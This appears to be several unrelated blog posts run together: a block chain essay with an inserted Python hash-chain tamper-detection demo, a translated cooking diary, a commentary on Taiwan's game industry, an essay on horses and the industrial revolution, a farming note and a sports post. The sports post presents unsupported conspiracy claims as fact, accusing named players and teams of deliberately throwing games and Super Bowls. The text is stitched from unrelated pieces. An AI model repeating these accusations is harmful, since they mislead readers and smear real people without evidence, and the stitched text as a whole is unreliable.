Much as pocket calculators pioneered an early era of limited personal computing before the dawn of the general-purpose personal computer, Bitcoin has pioneered the field of trustworthy computing with a partial block chain computer. Bitcoin has implemented a currency in which someone in Zimbabwe can pay somebody in Albania without any dependence on local institutions, and can do a number of other interesting trust-minimized operations, including multiple signature authority. But the limits of Bitcoin's language and its tiny memory mean it can't be used for most other fiduciary applications, the most obvious example being risk pools that share collateral across a pool of financial instruments.

A block-chain computer, in sharp contrast to a web server, is shared across many such traditional computers controlled by dozens to thousands of people. By its very design each computer checks each other's work, and thus a block chain computer reliably and securely executes our instructions up to the security limits of block chain technology, which is known formally as anonymous and probabilistic Byzantine consensus (sometimes also called Nakamoto consensus). The most famous security limit is the much-discussed "51% attack". We won't discuss this limit or the underlying technology further here, other than saying that the oft-used word "trustless" is exaggerated shorthand for the more accurate mouthful "trust-minimized", which I will use here. "Trust" used in this context means the need to trust remote strangers, and thus be vulnerable to them.

Trust-minimized code means you can trust the code without trusting the owners of any particular remote computer. A smart phone user in Albania can use the block chain to interact with a computer controlled by somebody in Zimbabwe, and they don't have to know or trust each other in any way, nor do they need to depend on the institutions of either's countries, for the underlying block chain computer to run its code securely and reliably. Regardless of where any of the computers or their owners are, the block chain computer they share will execute as reliably and securely as consensus technology allows, up to the aforementioned limits. This is an extremely high level of reliability, and a very high level of security, compared to web server technology. 

Instead of the cashier and ticket-ripper of the movie theater, the block chain consists of thousands of computers that can process digital tickets, money, and many other fiduciary objects in digital form.  Think of thousands of robots wearing green eye shades, all checking each other's accounting. Individually the robots (or their owners) are not very trustworthy, but collectively, coordinated by mathematics, they produce results of high reliability and security.

Often block chain proponents talk about the "decentralized" block chain versus the "centralized" web or centralized institutions. It's actually the protocol (Nakamoto consensus, which is highly distributed) combined with strong cryptography, rather than just decentralization per se, that is the source of the far higher reliability and much lower vulnerability of block chains. The cryptography provides an unforgeable chain of evidence for all transactions and other data uploaded to the block chain. Many other decentralized or peer-to-peer (P2P) technologies do not provide anything close to the security and reliability provided by a block chain protected by full Byzantine or Nakamoto consensus and cryptographic hash chains, but deceptively style themselves as block chains or cryptocurrency.
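To make the "robots checking each other's accounting" and the "chain of evidence" concrete, here is an added toy example (not code from the author or from any block chain project). It assumes a small fixed set of known replicas compared by simple majority, which is far weaker than Nakamoto consensus, and all names and transactions are constructed. It shows two things: a hash chain exposes a careless edit on one machine, and a careful operator who recomputes every hash on their own machine is still caught because their chain head no longer matches the other replicas.

```python
import hashlib
import json
from collections import Counter

GENESIS = "0" * 64

# Constructed sample transactions (names and amounts are made up).
SAMPLE_TXS = [
    {"from": "alice", "to": "bob", "amount": 5},
    {"from": "bob", "to": "carol", "amount": 2},
    {"from": "carol", "to": "alice", "amount": 1},
]


def entry_hash(prev_hash, payload):
    """Hash of one entry; it commits to the payload and to the previous hash."""
    body = json.dumps({"prev": prev_hash, "payload": payload}, sort_keys=True)
    return hashlib.sha256(body.encode("utf-8")).hexdigest()


class Ledger:
    """One replica's copy of the hash-chained transaction log."""

    def __init__(self, payloads=()):
        self.entries = []                       # list of (payload, hash)
        for payload in payloads:
            self.append(payload)

    def head(self):
        return self.entries[-1][1] if self.entries else GENESIS

    def append(self, payload):
        digest = entry_hash(self.head(), payload)
        self.entries.append((dict(payload), digest))
        return digest

    def first_bad_index(self):
        """Index of the first entry whose hash does not verify, else None."""
        prev = GENESIS
        for i, (payload, digest) in enumerate(self.entries):
            if entry_hash(prev, payload) != digest:
                return i
            prev = digest
        return None


def rewrite_history(ledger, index, new_payload, recompute):
    """Simulate the operator of ONE machine altering an old entry.

    recompute=False: only the payload is changed (a careless edit).
    recompute=True:  every later hash is rebuilt so the local chain verifies.
    """
    if recompute:
        payloads = [p for p, _ in ledger.entries]
        payloads[index] = new_payload
        ledger.entries = Ledger(payloads).entries
    else:
        ledger.entries[index] = (new_payload, ledger.entries[index][1])


def build_replicas(count):
    return {f"node-{i}": Ledger(SAMPLE_TXS) for i in range(count)}


def audit(replicas):
    """Compare chain heads; return (majority_head, names that disagree)."""
    heads = {name: ledger.head() for name, ledger in replicas.items()}
    majority_head, votes = Counter(heads.values()).most_common(1)[0]
    if votes * 2 <= len(replicas):
        raise ValueError("no majority among replicas")
    dissenters = sorted(n for n, h in heads.items() if h != majority_head)
    return majority_head, dissenters


if __name__ == "__main__":
    forged = {"from": "bob", "to": "mallory", "amount": 200}
    nodes = build_replicas(5)
    rewrite_history(nodes["node-2"], 1, forged, recompute=True)
    print("local check on node-2:", nodes["node-2"].first_bad_index())
    print("replicas that disagree:", audit(nodes)[1])
```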

A big drawback is that our online and distributed block chain computer is much slower and more costly than a web server: by one very rough estimate, about 10,000 times slower and more costly, or about the same as it cost to run a program on a normal computer in 1985. For this reason, we only run on the block chain that portion of an application that needs to be the most reliable and secure: what I call fiduciary code. Since the costs of human ("wet") problems caused by the unreliability and insecurity of web servers running fiduciary code are often far higher than the extra hardware needed to run block chain code, when web server reliability and security falls short, as it often does for fiduciary computations such as payments and financial contracts, it will often make more sense  to run that code on the block chain than to run it less reliably and securely on a web server. Even better, the block chain makes possible new fiduciary-intensive applications, such as posting raw money itself to the Internet, securely and reliably accessible anywhere on the globe -  apps that we would never dare do with a web server.

What kinds of fiduciary code can we run? We are still thinking up new applications and the categories will be in flux, but a very productive approach is to think of fiduciary applications by analogy to traditional legal code that governs traditional fiduciary institutions. Fiduciary code will often execute some of the functions traditionally thought of as the role of commercial law or security, but with software that securely and reliably spans the globe regardless of traditional jurisdiction. Thus:

* Property titles (registered assets), where the on-chain registry is either the legally official registry for off-chain assets or controls on-chain ones, thus providing reliable and secure custody of them. One can think of a cryptocurrency such as Bitcoin as property titles (or at least custody enforced by the block chain consensus protocol) to bits recognized as being a fixed portion of a currency, or as controlling unforgeably costly bits, or both. Block chains could also control hardware which controls the function of and access to physical property.

* Smart contracts: here users (typically two of them) agree via user interface to execute block chain code, which may include transfer of money and other chain-titled assets at various times or under various conditions, transfer and verification of other kinds of information, and other combinations of wet or traditional (off-chain) and dry (on-chain) performance. A block chain can hold cryptocurrency as collateral (like an escrow) which incentivizes off-chain performance that can be verified on-chain, by the parties or by third parties. A full block chain computer can pool on-chain assets into a single chain-controlled risk pool spread among many similar financial contracts, reducing the amount of collateral that needs to be stored on-chain while minimizing the need for off-chain collateral calls. The block chain can also make the search, negotiation, and verification phases of contracting more reliable and secure. With on-chain smart contracts we will be able to buy and sell many online services and financial instruments by button and slider instead of by laboriously filling out forms that disclose our private information.

* On-chain treasuries, trusts, and similar, where money lives on the block chain and is controlled by multiple signature ("multisig") authority. Putting a treasury with signature authority on a block chain computer is low-hanging fruit, but is often tied to more speculative efforts under the label "distributed autonomous organization (DAO)", which may include voting shares and other mechanisms to control the treasury like a corporation or other kind of organization.

I hope to discuss these block chain applications, especially smart contracts, in future posts. While there is much futurism in many block chain discussions, including many trying to solve problems that aren't actually solved by the block chain, I will generally stick to low-hanging fruit that could be usefully implemented on Quixcoin, Ethereum, or similar technology in the near future, often interfacing to still necessary parts of traditional protocols and institutions rather than trying to reinvent and replace them in whole.

References

Here is a list of basic computer science papers describing the technology of block chains (including cryptocurrencies).

Wet vs. dry code

Thursday, October 23, 2014

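What I've Been Cooking Lately

It's been a long time since I updated the blog, so come in and let me share some of the tasty things I've cooked! Everything is expensive these days, so as a housewife I really have to learn to cook everything myself!

Korean Pancake
Mix eggs with flour, water, pepper, salt and cheese powder into a batter, then add shredded cabbage, onion and shredded carrot and fry until golden brown. My two girls helped make this one! Both of them kept saying how delicious it was!

Squid with Water Spinach
This was my first time making it. I bought a squid for eight kuai and water spinach for one and a half kuai, added a little crushed peanut, and that made a big plate. It was my first time cooking squid, so I phoned my mum, and she said: "I haven't cooked it in decades, I've forgotten." I phoned my sister, and she said: "I don't know how, but Mum does, ask Mum!" In the end I asked the all-knowing Big Brother Google, and that's how I made it. My husband loves it! He was very pleasantly surprised that I could make squid with water spinach, because he hadn't eaten squid in a long time.

Bacon and Fried Egg Breakfast
My little girl said she had never eaten bacon, so I bought some bacon and fried some eggs for breakfast. I had never bought bacon for breakfast before, so it was a first! Of course they said it was delicious!

Crispy Fried Shishamo
These were simply coated in flour and deep-fried, but they were a bit fishy and not as good as the ones at Japanese restaurants. That's cheese sauce on top.


Meat Buns
One boring afternoon I made meat buns again. My husband and daughters said my buns are looking more and more like the real thing, hee hee, so happy!


Chilled Sea Bird's Nest Salad
This one is complicated to prepare, and once it's made I'm the only one who eats it.

Dry Mutton Curry
On rainy days I really crave curry, especially mutton.

Pizza Made by My Girls
I bought ready-made crusts and let the girls cut up the toppings and put them on themselves, and that became our dinner one evening.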

Tuesday, October 21, 2014

[Thoughts] Looking at Taiwan from a certain corner of the world...



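It's been a long time since I wrote a post; after changing jobs I became extremely busy. This time I want to write something that has nothing at all to do with professional knowledge, so maybe you won't feel so sleepy. What I want to talk about is a little more on the sentimental side.

First, a sigh: the things I expected back then have more or less come true. Mainland Chinese companies and capital seem to have taken over the Taiwanese market. Most vendors survive but are severely short of content, and because of how they are built many of them still cling to the Taiwanese market. Don't get me wrong, Taiwan is a prime cut of meat: a market that is small, easy to enter and with relatively high returns. But precisely because of that, vendors who cling to Taiwan face a great many challenges: 1. World-class content being translated into Chinese and localized. 2. A very low barrier for mainland Chinese content to enter Taiwan. 3. Auction-based ad buying becoming mainstream, and marketing costs soaring. 4. Products that fit Chinese culture do not necessarily fit markets other than China, while the Chinese market is relatively chaotic and Taiwanese vendors have very little grip on it. As for mainstream products that truly suit the international market, Taiwan really lacks a successful role model.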



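In addition, opportunities for Taiwanese vendors have, relatively speaking, started to shrink: 1. Two or three years ago mobile was just getting started and everyone was in the exploratory phase at the same time, so the pace of progress was about even. Now the learning ability and pace of improvement of Japan and Korea in games and of Europe and America in apps, together with the fundraising speed of Chinese vendors, are more than Taiwanese vendors can catch up with, and my personal feeling is that the gap will only widen. 2. The exodus of talent: Taiwanese vendors used to have plenty of good people and just about enough development capability, but in recent years they have faced poaching by big mainland companies and the Taiwan branches of foreign firms, and the developers who remain have again shrunk by more than half. To develop good products in the future, education will be very important. 3. The competitive advantage of licensing rights has been greatly weakened: now, as long as the content is good enough, many games ship globally as a single version in multiple languages, localized operations are easy to replace, and mainstream media such as FB, YouTube and AdMob can all be bought across borders. Opening a branch in Taiwan directly, or hiring an agency to run operations, can also replace the licensing model. 4. Competition on capital: setting aside how Chinese money gets into Taiwan through overseas channels while evading the inspections of the Financial Supervisory Commission and the Industrial Development Bureau, the capital of any other overseas game company that has made a name for itself can easily crush Taiwanese vendors. Competing on capital worked back when Taiwan was still somewhat closed, and the big publishers did have a bit of an advantage; now Taiwan's biggest publisher is at most a small shrimp next to the strong international players. This is not about belittling ourselves; it's that we should think about other strategies. Taking your own short pistol up against someone else's big foreign cock is not going to win. (Voice from off-stage: we Easterners compete on technique!) (Netizens: and on expansion ratio)

In the third part, let me talk about why I think developers should focus on creating value and capturing value:

Point one: stop building game platforms. In a place like Taiwan, game platforms are very hard to make work. The reason is simple: trust me on this. Otherwise, look at the international precedents, DeNA and GREE: trying to grab distribution from the big platforms is hard to pull off, and even if you pull it off it is hard to sustain. Platforms will always try to preserve their exclusivity; unless you build a super-strong platform that can monopolize the market, don't force it if you don't have that idea. And even if you want to treat Kakao or Line as platforms, they are built on top of a product; if the IM app itself does not succeed, it will fail no matter how many games sit on it.

Building a platform requires four characteristics: 1. strong user acquisition (Acquire User); 2. user retention (Retain User); 3. Engage User (I'm not sure how best to say this in Chinese; stickiness?); 4. a payment model (Monetize). Most current platforms in Taiwan have none of these functions: users are acquired by buying ads, after the ads the product itself cannot keep the customers, the service itself cannot keep engaging users, and by then the payment model usually no longer matters. For example, why did the LINE and Kakao model succeed? Free messaging was very powerful for early user acquisition, the product's own features are very attractive, LINE has cute stickers, and the services the product offers satisfy most needs. And because the product is an IM, it is easy to engage users to use it: the moment you receive a sticker from the girl you fancy, you open the product right away. (I really didn't want to use LINE as the example, it's such a cliché, but I think it's the most approachable.)

Conversely, why would anyone install or open your platform? If you can't answer that question, kill the project.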

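Point two: stop thinking only about developing a good game. Oh, I'm not saying you should develop bad games; I mean you should think about the bigger picture. The problems Taiwanese vendors will run into next all have to do with scalability. For example, if your connection stability relies heavily on local Taiwanese IDCs, what happens when you expand into Southeast Asia? Or if a large share of your revenue comes from prepaid point cards, can you operate well in countries that have no point cards? Does the content fit culturally? Is there demand for the solution you provide? Also on scalability, I have seen many foreign products that had thought a lot of things through at the design stage. I once saw two apps, both for flight information, with similar UI, technology and service; one was limited to the Hong Kong area, while the other could look up any airport internationally. This is a case where the product itself limits its own scalability.

The other kind is mindset. Some developers love to play tricks; some want to play tricks but don't know how best to do it; some have no mind to play tricks; and some really know how but have already discovered the benefits of not doing so. For instance, someone told me that the boss of company XGG once said they no longer need to play tricks; they are now looking to do business globally. That mindset is a matter of vision, and your mindset shapes your vision. Don't believe it? Let me give examples. Some games like to send a pile of spam, cluttering the user's notification screen, and engagement seems to go up because of accidental taps; but look closely and the uninstall rate of such apps is extremely high, and brand and ratings rot too. Some games like to manipulate chart rankings, pushing themselves to a very high rank; players go in and find the game is bad, and over time players stop trusting charts, so the manipulation is wasted. Some games like to go for sensational, sexual content, thinking it is effective; do you think that kind of thing can get out of Taiwan and China? Can it get into advanced countries?

Have you noticed that the companies that truly have scalability don't do this? You can keep doing it this year, and next year too, but in two or three years you will find Taiwan ruled by these companies with scalability. Taiwan's biggest dating site, Taiwan's biggest food site, Taiwan's biggest news site, Taiwan's biggest music site: RIP. Think of the potato chip brand 波的多 back in the day...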

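Point three: content is king, distribution is god, and payment can only play the little hussy who spreads her legs at the sight of money. I seriously think Taiwan still needs to put more emphasis on content development. Taiwan does have a very small number of vendors focused on content that have won international-level recognition, such as Rayark (yes, another cliché), but what I want to say is simple: in order to acquire, retain and engage users, a distribution channel cares a great deal about the quality of the content it offers. So? It will place great value on developers who can produce high-quality content. If the channel includes a store, it will handle payment itself as well. Since Apple recently integrated its own wallet, it has been unstoppable. In future, payment providers will only side with platform owners or with strong content and services, but if the platform owner has stronger integration capability it has no reason to use any Taiwanese payment provider's solution. For example, would Apple Pay integrate the NFC checkout features launched by Taiwan's banks? And when content providers face a conflict of interest between platform owners and payment providers, whom will the strong content providers choose? After the third-party payment bill passes and Apple Gift Card and Google Play Gift Card arrive, what happens to the business of Taiwan's point-card vendors? Do they seriously think they can run APK markets and JB markets the way mainland China does? Especially when Android and Apple have begun horizontally integrating all devices, can they really keep up? Especially once content has all gone global? This is a war of scale; if you're not at that level, don't attempt this dungeon.

Think about it: would SUPERCELL integrate MXCARD? Would Candy Crush need Beanfux login? The era of riding on the advantage of an online membership platform is over; embrace the era of seriously making content! If in the end the device makers really do unify payments, there will be nothing to be done about it.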

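Point four: take UX/UI seriously. I'm no expert in this area, but through work I have come across quite a few cases. Leaving aside complex game experience and interface design, Taiwanese vendors have a pile of problems with the login flow alone. This is the most indicative thing for early conversion rates, yet I have never heard of a vendor tracking this funnel, and those who roughly know about it rarely put effort into scientific optimization through A/B testing. Without knowing even this, on what basis do you decide whether to scale? (Guts?)

Judgments of good and bad UX/UI are also made very much through Taiwanese eyes, which comes back to the scalability problem: maybe Taiwanese people are used to it, but what about outside Taiwan?

I remember once posting the introduction site for our company's new product, a very minimal design, and a friend of mine said: why is this website's design so bad? There's nothing on it but the price, one picture and a buy button!

This really is a matter of taste. Taiwanese people looking at mainland Chinese websites also feel dizzy, and Westerners looking at Taiwanese websites feel the same. But the mainland market is closed and very big; what about Taiwan? Will you still insist on your own way?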

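The last part: ah damn, I'm a licensing publisher, so what do I do?

1. While you still have plenty of money, buy lots of developers and start planning your global footprint. But mainland Chinese vendors can offer higher prices than you.
2. Start hiring and building teams. But you will be competing with mainland Chinese vendors for talent.
3. Move into Southeast Asia and fight it out with the mainlanders. But your weapons still have to be imported from mainland China.
4. Form strategic investment alliances with strong developers to protect your product line. But there are examples both ways, and it doesn't necessarily end well.
5. Hang up your armour, go back to the farm and sell oil. You can compete with the mainland's gutter oil.
6. Keep licensing, and end up licensing worse and worse games. Mainland vendors can always bid a little more than you.
7. The Japanese-occupation era: Japanese vendors currently trust Taiwanese vendors relatively well, so keeping up the relationship is important. But money is more important (?)

I'm not singling you out; go and look at publishers in mature markets: those without content production capacity all die. Look at Zynga, which raised so much money at its IPO; luckily it bought CSR Racing, otherwise it would have been gone long ago. Look at 6 waves, which was riding so high back then; where is it now? It too is starting from zero, with no advantage at all. The smarter ones, like Happy Elements, got into developing some Japanese products and are doing very well now.

Summary: although some people feel the winter is warming up, that is only an illusion produced by foreign content providers compromising for the moment and by explosive growth in the device market. Fundamentally Taiwan's economic system has not improved much, and the pace at which core capabilities are improving is clearly lagging. I worry for the Taiwanese vendors who have no control over content, and I am not optimistic about how fast content developers are learning. As for scaling from 1 to 100, beyond capital and technology, what I fear more is the mindset and vision of Taiwanese vendors. And I find it a pity that zero-to-one creativity and entrepreneurs are so rarely seen. Finally, on creating value and capturing value, I'd like to share this video: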

Thursday, October 16, 2014

Transportation, divergence, and the industrial revolution

After about 1000 AD northwestern Europe started a gradual switch from using oxen to using horses for farm traction and transportation.  This trend culminated in an eighteenth-century explosion in roads carrying horse-drawn carriages and wagons, as well as in canals, and works greatly extending the navigability of rivers, both carrying horse-drawn barges. This reflected a great rise in the use of cultivated fodder, a hallmark of the novel agricultural system that was evolving in northwestern Europe from the start of the second millennium: stationary pastoralism.  During the same period, and especially in the seventeenth through nineteenth centuries, most of civilized East Asia, and in particular Chinese civilization along its coast, navigable rivers, and canals, faced increasing Malthusian pressures and evolved in the opposite direction: from oxen towards far more costly and limited human porters. Through the early middle ages China had been far ahead, in terms of division of labor and technology, of the roving bandits of northern Europe, but after the latter region's transition to stationary pastoralism that gap closed and Europe surged ahead, a growth divergence that culminated in the industrial revolution.  In the eighteenth century Europe, and thus in the early industrial revolution, muscle power was the engine of land transportation, and hay was its gasoline. 

Metcalfe's Law states that a value of a network is proportional to the square of the number of its nodes.  In an area where good soils, mines, and forests are randomly distributed, the number of nodes valuable to an industrial economy is proportional to the area encompassed.  The number of such nodes that can be economically accessed is an inverse square of the cost per mile of transportation.  Combine this  with Metcalfe's Law and we reach a dramatic but solid mathematical conclusion: the potential value of a land transportation network is the inverse fourth power of the cost of that transportation. A reduction in transportation costs in a trade network by a factor of two increases the potential value of that network by a factor of sixteen. While a power of exactly 4.0 will usually be too high, due to redundancies, this does show how the cost of transportation can have a radical nonlinear impact on the value of the trade networks it enables.  This formalizes Adam Smith's observations: the division of labor (and thus value of an economy) increases with the extent of the market, and the extent of the market is heavily influenced by transportation costs (as he extensively discussed in his Wealth of Nations).
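The chain of proportionalities in the paragraph above, written out as an added worked derivation. The symbols are notation introduced here, not the author's: $c$ is the transport cost per mile, $B$ the largest transport cost a shipment can bear (assumed fixed), $r$ the resulting reach, $A$ the area within reach, $N$ the number of accessible nodes and $V$ the potential value of the network.

$$ r = \frac{B}{c}, \qquad A \propto r^{2} \propto c^{-2}, \qquad N \propto A \propto c^{-2}, \qquad V \propto N^{2} \propto c^{-4} $$

$$ \frac{V(c/2)}{V(c)} = \left(\frac{c/2}{c}\right)^{-4} = 2^{4} = 16 $$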

The early industrial revolution was highly dependent on bringing together bulk goods such as coal and iron ore. Land transportation of such materials more than a dozen miles in most parts of the world was prohibitively costly, and they were only rarely located a shorter distance from navigable water (the costs per mile of water transport were generally orders of magnitude cheaper than the costs per mile of land transport). As a result, the early industrial revolution, and the potential for a region to be the first to industrialize, was very sensitive to small changes in land transportation costs.

Furthermore, land and sea-borne transportation were far more complements than substitutes. Cheaper land transportation was a "force multiplier" for water transportation. Decreasing the costs of getting to port from field or mine by a factor of two increased the number of fields and mines accessible by a factor of four, and increased the number of possible ways to divide labor, and thus the value, by an even greater factor via Metcalfe's law. This in turn incentivized greater investment in sea-borne transport. It's thus not surprising that, even before the industrial revolution, the leaders in global trade and colonization were European countries that could access the Atlantic.

By the dawn of the industrial revolution in northwest Europe the effects of horse haulage had already been dramatic: a drop by a factor of two in the costs, and an increase in speed by about the same factor, of transporting goods by land, with a corresponding increase in commercial crop area and in the area that could be economically lumbered and the coal and metals that could be mined. Multiply that factor of four by much more when we factor in (1) innovations in wheels, tires, shock absorption, and road building that followed on the heels, as it were, of the great increase in horse haulage, and (2) the great increase in mileage and inland penetration of navigable rivers and canals, especially in the 18th century, the barges again hauled by horses. And as Metcalfe's Law suggests, the number of combinations, and thus the value, increased by a far greater factor still. Not only did northwestern European ports have access to far more land, but there were far more ports far more "inland" along rivers and canals, thanks again chiefly to the draft horses and the nutrient-rich cultivated fodder that fed them.

To enable the industrial revolution, mines and nutrient-dense fodder had to be colocated within efficient bulk transport distance of each other — which in the case of horses hauling coal or wood by rural road, was typically less than twenty miles, and for oxen and human porters far less still — to produce the low-cost bulk transportation networks needed to make industrial revolution scale use of most commercial crops and mines. Efficient bulk transportation is needed _all the way_ between the iron mine, the coal mine, and the smelter.  Because the cost per mile of water transport was so much smaller than the costs of land transport, this “last few miles to the mine” problem usually played a dominant role in transportation economics, somewhat analogous to the “last mile” problem in modern cable networks. That’s why stationary pastoralism with its efficient markets for nutrient-dense (because cultivated) fodder was such a huge win — it allowed horses to be housed at the mines, canals, roads, and factories where they worked, which no place in the world outside Europe could during that era do.  Nutrient-dense fodder created a virtuous recursion, enabling itself to be harvested (via horse-drawn mows and rakes) and transported to mine, factory, and stable at increasingly lower costs.

Industrialization came in many phases. Very roughly speaking, the first phase, in the latter half of the eighteenth century, involved the culmination and optimization of the use of horses, by northwestern Europe, and especially England, greatly expanding its horse wagon and carriage roads and horse-drawn barge canal networks.  Horses brought coke or charcoal and iron ore to the smelters. Horse-powered capstans performed some arduous farm tasks such as threshing. Along with primitive Newcomen steam engines they pumped coal mines. Horse gins also powered most of the early versions of innovative textile machinery (they switched to more power-efficient water mills when they later scaled up).  That classic carnival ride, the merry-go-round, was inspired by these perpetually circling horses.

Again roughly speaking, the second phase of industrial growth, after about 1830, was more scientific and far easier to copy than northwestern Europe's unique biology: steam engines came to replace horse gins and water mills for running industrial machinery, and the steam-powered railroad radically lowered transportation costs between major mines, factories, and urban centers. When non-European countries industrialized, such as Japan after the 1870s, they did it in a "leap-frog" style: they skipped over the long-evolved improvement in draft animals and went straight to mature steam engines and, soon thereafter, electrical motors.  Much as countries installing phone networks for the first time over the last few decades have leap-frogged over the land line era, going straight to cell phones. Starting early in the 20th century industrializing countries could replace all the remaining important functions of the horse with internal combustion engines.  England, which made the longest and most thorough use of the horse, and thereby had the transportation economies allowing it to pioneer the industrial revolution, had a less pressing need to use the internal combustion engine and thus lagged enough in that technology so that second-generation  industrializers like Japan, Germany, and the United States became leaders in internal combustion engine products.

Given the scientific nature of the second phase of the industrial revolution, which could be discovered by any culture full of literate craftsmen, this second phase was more technologically inevitable and didn't ultimately depend on northwestern Europe's unique biology. At the same time, during the long evolution that culminated in the industrial revolution, and during its first phase, land transportation the world over was muscle powered and the unique system of stationary pastoralism, by breeding draft horses that ran on cultivated, nutrient-dense fodder, substantially lowered transportation costs. This allowed the value of northwestern Europe's bulk transportation networks to radically increase and made it very nearly as inevitable that that region would be the pioneers of the industrial revolution.

Hat tips and references: Edward Wright and Raymond Crotty among many other authors have explored some of these issues.

The romance vs the reality of farming

I'm in the middle of a visit to Cape Breton, Nova Scotia. It's a tremendously scenic place and the people here are amazingly friendly and welcoming. 
Near Whale Cove, Nova Scotia

It is also a place that historically has sent many of its sons and daughters away to find work elsewhere. Buildings have fallen to ruin and once-cleared farmland has reverted to woody perennials. Which reminded me of a quote one of my Caper friends gave me.
Romance vs Reality (quote from My Remarkable Uncle, 1942)

Too many, I'm afraid, have a view of agriculture and food production that's more romantic than realistic. Folks who can afford to move back to the country, plant a garden, tend an orchard, and raise a few animals are blessed. But they aren't the same as folks who are doing that for a living. Nor is their life and the lives of their family members dependent upon what they produce. Subsistence farming is NOT secure.

There's a difference between farming WITH money and farming FOR money.

I'm hoping to get back to posting more regularly ...

Edits: 1. Corrected title of Leacock's book; 2. Corrected error in second to last sentence (thank you, @OnlookerfrTroy !).

Wednesday, October 1, 2014

Hail Mary Hoaxes, Super Bowl III and More Michigan Meltdowns

The Miami Hurricanes threw that Hail Mary game against Boston College in 1984 to enhance the Doug Flutie legend and ensure that college football would have a nice-looking, clean-cut, All-American boy as the Heisman Trophy winner that year.

Doug Flutie
I'm not saying Flutie wasn't a great quarterback. In fact, he's one of my all-time favorite players because he had so much heart and football savvy. It was especially inspiring to see him out there playing against all those big guys and outsmarting everybody because he was only 5 feet 10. The classic underdog.

But on that final play, I'll always believe the Miami secondary deliberately let Gerard Phelan get behind them to catch the game-winning pass. That's not how you defend the Hail Mary. You stay behind the receiver at all costs and knock the ball down if necessary. Those players knew that, and still they let Phelan get behind them for the easy game-winning catch. Watch the replay here: http://www.youtube.com/watch?v=q3ykWbu2Gl0

There was another obvious Hail Mary Hoax in the Cincinnati-Baltimore game on Nov. 10, 2013. Ravens safety James Ihedigbo, a veteran player in his sixth NFL season, tipped a deflected pass high in the air so it could be caught by the Bengals' A.J. Green for the tying touchdown.

All Ihedigbo had to do to ensure a Ravens victory was to let the ball fall harmlessly to the ground or bat it down. By deliberately tipping it back into the air, he allowed Green to score. You'd have to be pretty naive to believe that play was on the level. Read all about it and watch the replay here: http://www.huffingtonpost.com/2013/11/10/bengals-hail-mary-aj-green-james-ihedigbo_n_4251721.html

And don't forget the Hail Mary on the last play of the game that allowed Colorado to defeat Michigan 27-26 in 1994. Watch as the Michigan secondary leaves Michael Westbrook wide open to catch the deflected pass. Instead of everybody going for the ball, someone should have been on Westbrook to knock the ball down if it bounced his way. See the slow-motion replay here: http://www.youtube.com/watch?v=5Nt6HjqtJt8

Also, why is it that defensive teams always rush the passer with only three linemen when it's obvious a Hail Mary is about to be attempted? If I were a defensive coordinator, I'd blitz the quarterback so the receivers wouldn't have time to reach the end zone, let alone make a "miraculous" game-winning catch. That wouldn't make for a very exciting finish though, would it?

For example, check out this Hail Mary Hoax that allowed Auburn to escape with a win over Georgia on Nov. 16, 2013. Auburn trailed 38-37, and it was fourth down and 18 from their own 27-yard line with 36 seconds left in the game. Georgia rushes only three defenders, and watch the one in the middle. He just stands there! That means there were only two defenders rushing the passer! Watch the replay here: https://www.youtube.com/watch?v=XkpDz8YyVD8

Isn't it obvious that Georgia wanted to give Auburn a chance to complete the Hail Mary? All the Georgia secondary had to do was let the pass fall harmlessly to the ground and they would have won the game. Instead, they deliberately tipped it to the Auburn receiver and let him waltz into the end zone for the winning score.

LOL! Are sports fans really that naive? A second-grader could see it was all a hoax!

Speaking of hoaxes, there were two glaring examples of fixed games in the early years of the Super Bowl to give the old AFL teams more credibility after they merged with the NFL. The Baltimore Colts threw the Super Bowl to Joe Namath and the New York Jets in 1969, and the Minnesota Vikings threw the 1970 Super Bowl to the Kansas City Chiefs.

No wonder Namath boldly predicted the Jets would win in 1969, even though they were 18-point underdogs. He probably knew the fix was in.

It's even worse today.

Another thing that happens is that key players fake injuries to hurt their team's chances and give the team an excuse for losing the game. And coaches cooperate by failing to make obvious strategy adjustments and taking a laissez-faire attitude when their team starts to go into meltdown mode.

For example, in their "loss" to Ohio State in 2012, Michigan kept trying to run the ball up the middle in the second half with little success, despite having great success in the first half by throwing the ball and running wide. After scoring 21 points in the first half, they were shut out in the second half because of play-calling that appeared to be stupid, but was actually deliberate. It was designed to fail.

Michigan was forced to throw all its losses in 2013, including the 17-13 "loss" to Nebraska. Devin Gardner, easily one of the quickest, fastest and most agile quarterbacks in the country, inexplicably forgot how to elude the pass rush in this game. When he's not actually trying to get sacked, he's adept at dodging tacklers. Just ask Notre Dame and some of the other teams he's exploited during his career at Michigan.
Devin Gardner runs for a big gain against Notre Dame.
But Gardner also has been instrumental in throwing some games and keeping the score close in others. His ridiculous "mistake" against Notre Dame in 2013 kept that game close when he threw a pass high up in the air toward a gang of Notre Dame players as he was being tackled in the end zone. He could easily have thrown the ball into the turf or even taken a safety. Instead, Notre Dame intercepted for an easy touchdown. Watch the replay here at the 1:30 mark: http://www.youtube.com/watch?v=iP6JrFrtmd4

And then there was the badly overthrown, deliberate interception that sealed the Ohio State loss in 2012: http://www.youtube.com/watch?v=U06UyVx8WIk Not to mention the interception he deliberately threw to the Ohio State secondary on the 2-point conversion play that would have won the game in 2013 if it had been successful.

And the deliberate fumble that led to a touchdown against Connecticut, shown here at the 0:50 mark: http://www.youtube.com/watch?v=8L3lE0l-3bY

Against Nebraska and Michigan State, it didn't help that the offensive line suddenly forgot how to protect the quarterback.

Are we really supposed to believe Nebraska's defense and Michigan State's defense are both just too strong and fast for a Michigan offense that scored 63 points on Indiana, 59 on Central Michigan and 40 or more points against Notre Dame, Penn State and Minnesota? That all they could muster against their archrival, Michigan State, was two lousy field goals in the biggest game of the season? That they could be shut out for the entire second half? I'm not buying the cover story for one instant, and you shouldn't either.

And how about Notre Dame being ordered to stand down at home against perennial patsy Navy last season, struggling to win 38-34, one week after blowing out Air Force 45-10 at Colorado Springs? And then losing to Pittsburgh, 28-21 -- a team that gave up 55 points against Duke earlier this season.

Michigan also shaved points against Akron on Sept. 14, 2013, when they struggled to win at home, 28-24, despite being a 37-point favorite. Reminds me of that time they "lost" to Appalachian State a few years back. Another obvious hoax. Do you really think Appalachian State and Akron would have had a chance in those games if Michigan hadn't been required to throw the game or keep it close?

Some of the other obvious hoaxes last season include losses by three teams that were in danger of qualifying for the BCS Championship Game. Clemson got blown out at home by Florida State, Stanford lost to Utah, 27-21, and then Oregon lost to Stanford, 26-20. The NCAA doesn't like having too many undefeated teams because it creates controversy over the corrupt BCS system.

